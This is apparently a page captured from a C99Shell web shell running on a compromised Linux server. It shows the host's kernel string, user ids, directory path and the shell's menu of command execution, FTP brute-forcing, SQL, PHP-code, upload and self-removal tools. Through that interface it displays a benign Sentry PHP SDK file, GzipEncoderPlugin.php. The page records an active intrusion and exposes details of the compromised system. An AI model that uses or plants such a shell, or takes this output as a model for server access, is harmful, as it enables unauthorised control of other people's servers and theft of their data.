!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/vendor/sentry/sentry/src/HttpClient/Plugin/   drwxr-xr-x
Free 29.1 GB of 117.98 GB (24.67%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     GzipEncoderPlugin.php (1.88 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
Sentry\HttpClient\Plugin;

use 
Http\Client\Common\Plugin as PluginInterface;
use 
Http\Promise\Promise as PromiseInterface;
use 
Psr\Http\Message\RequestInterface;
use 
Psr\Http\Message\StreamFactoryInterface;

/**
 * This plugin encodes the request body by compressing it with Gzip.
 *
 * @author Stefano Arlandini <sarlandini@alice.it>
 */
final class GzipEncoderPlugin implements PluginInterface
{
    
/**
     * @var StreamFactoryInterface The PSR-17 stream factory
     */
    
private $streamFactory;

    
/**
     * Constructor.
     *
     * @param StreamFactoryInterface $streamFactory The stream factory
     *
     * @throws \RuntimeException If the zlib extension is not enabled
     */
    
public function __construct(StreamFactoryInterface $streamFactory)
    {
        if (!
\extension_loaded('zlib')) {
            throw new 
\RuntimeException('The "zlib" extension must be enabled to use this plugin.');
        }

        
$this->streamFactory $streamFactory;
    }

    
/**
     * {@inheritdoc}
     */
    
public function handleRequest(RequestInterface $request, callable $next, callable $first): PromiseInterface
    
{
        
$requestBody $request->getBody();

        if (
$requestBody->isSeekable()) {
            
$requestBody->rewind();
        }

        
// Instead of using a stream filter we have to compress the whole request
        // body in one go to work around a PHP bug. See https://github.com/getsentry/sentry-php/pull/877
        
$encodedBody gzcompress($requestBody->getContents(), -1\ZLIB_ENCODING_GZIP);

        if (
false === $encodedBody) {
            throw new 
\RuntimeException('Failed to GZIP-encode the request body.');
        }

        
$request $request->withHeader('Content-Encoding''gzip');
        
$request $request->withBody($this->streamFactory->createStream($encodedBody));

        return 
$next($request);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--